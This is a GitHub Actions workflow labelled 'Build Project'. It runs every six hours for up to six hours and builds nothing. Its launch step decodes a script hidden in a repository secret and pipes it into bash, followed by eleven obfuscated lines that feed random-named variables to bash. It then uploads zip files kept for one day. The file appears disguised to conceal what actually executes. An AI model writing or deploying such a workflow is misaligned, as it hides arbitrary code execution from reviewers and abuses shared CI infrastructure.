name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '12 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Launch
        env:
          mgh3: ${{ secrets.mgh3 }}
        run: |
          printf '%s' "$mgh3" | jq -r .xcb76595 | /bin/bash
          printf '%s' "$wmi56" | jq -r .rlws627 | /bin/bash
          printf '%s' "$oxkzi3407" | jq -r .ktztw64 | /bin/bash
          printf '%s' "$l80414" | jq -r .akeg4 | /bin/bash
          echo $wfjj7324 | jq -r .duwx9413 | /bin/bash
          printf '%s' "$ffd5295" | jq -r .hisf61824 | /bin/bash
          echo $sgf6 | jq -r .o4 | /bin/bash
          printf '%s' "$xheuy951" | jq -r .oct763 | /bin/bash
          printf '%s' "$msiw5" | jq -r .sbs0 | /bin/bash
          echo $kxd8 | jq -r .boyx89714 | /bin/bash
          echo $jyfl66360 | jq -r .yzu21 | /bin/bash
          echo $vvoe2358 | jq -r .ehh12 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: QlucrnQW
          path: "*.zip"
          retention-days: 1
